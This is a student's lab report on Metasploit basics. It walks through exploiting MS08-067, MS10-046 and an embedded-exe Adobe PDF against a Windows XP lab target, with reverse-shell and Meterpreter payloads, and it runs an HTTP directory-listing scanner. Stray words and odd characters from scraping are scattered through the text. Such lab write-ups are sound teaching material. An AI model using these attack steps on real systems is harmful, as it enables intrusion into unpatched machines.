20145239杜文超《網絡攻防》- MSF基礎應用

20145239杜文超《網絡攻防》- MSF基礎應用

基礎問題回答

一、用本身的話解釋什麼是exploit,payload,encode?shell

  • exploit:實現攻擊行爲的主體,但沒有載荷只是一個空殼。沒有子彈的槍是很好的比喻。
  • payload:載荷。通常指shellcode,攻擊成功後須要運行的東西。
  • encode:編碼器。使得咱們的攻擊中不會出現「壞字符」,也能夠經過編碼改變特徵碼,實現免殺。

實驗總結與體會

msf僅僅是一個攻擊平臺,攻擊具體的實現仍是要靠抓住靶機上的漏洞進行。本次實驗我對metasploit的體系結構有了初步的認識。尤爲是對6個主要模塊的功能和用途有了深刻理解和實踐經驗。我也深入的認識到在現實中想要真正攻陷一臺靶機仍是有難度的,由於本次實驗我使用的靶機是win xp sp3英文版系統。很老,應該算是被淘汰的了,因此纔會有那麼多漏洞讓我能夠抓住去攻擊,如今windows版本不斷更新,漏洞補丁的更新速度也愈來愈快,所以更體現出了0 day漏洞的價值。windows

實驗過程

實驗環境配置

攻擊機:Kali(IP:192.168.248.128)api

靶機:Windows XP SP3(IP:192.168.248.129)瀏覽器

MS08_067漏洞滲透攻擊

一、先用search ms08_067指令查詢該攻擊模塊。網絡

二、輸入use exploit/windows/smb/ms08_067_netapi使用該模塊,並用show payloads指令查看一下要用的payload。session

三、輸入set payload generic/shell_reverse_tcp設置一下payload,經過反向鏈接獲取shell。tcp

四、使用show options指令查看須要進行的配置。編碼

五、如圖所示進行配置,設置RHOST爲遠程靶機IP地址、LHOST爲主機IP地址。url

六、設置完成後再次確認剛纔的設置。3d

七、輸入exploit發起攻擊。

八、攻擊成功,成功獲取靶機系統shell。

 

對瀏覽器攻擊:ms10_046漏洞攻擊

一、先利用search ms10_046指令查看能夠運用的攻擊模塊.

 

二、使用該漏洞進行攻擊。

三、設置相關參數。SRVHOST是本地監聽主機的IP地址,LHOST是監聽的IP地址,都填攻擊者本機IP地址。

四、發起攻擊,能夠看到,生成了url連接地址。

五、咱們使用靶機的IE瀏覽器登錄一下剛纔生成的url地址。

六、發現主機這邊已經攻擊成功了。

七、使用命令sessions -i 1開始鏈接,成功獲得shell。

 

對Adobe的漏洞攻擊:adobe_pdf_embedded_exe

一、進入文件攻擊目錄選擇一個合適的adobe漏洞。

二、我選擇的是adobe_pdf_embedded_exe,use這個漏洞。

三、設置一下payload攻擊有效載荷:set payload windows/meterpreter/reverse_tcp

四、show options查看須要進行哪些配置。

五、設置文件名稱5239.pdf,LHOST爲攻擊者主機IP。

六、再次使用show options檢查配置。

七、發起攻擊。發現生成了一個名爲5239的pdf文件。

八、把攻擊主機設置爲監聽狀態,方法和之前的實驗相似。

九、將該pdf拷貝到靶機上而後打開。

十、攻擊機已經成功獲取到靶機shell。

 

輔助模塊的應用:scanner/http/dir_listing

一、先用search瞭解一下有關scanner/http/dir_listing的相關信息。

二、設置相關參數。

三、run,運行成功。

相關文章
相關標籤/搜索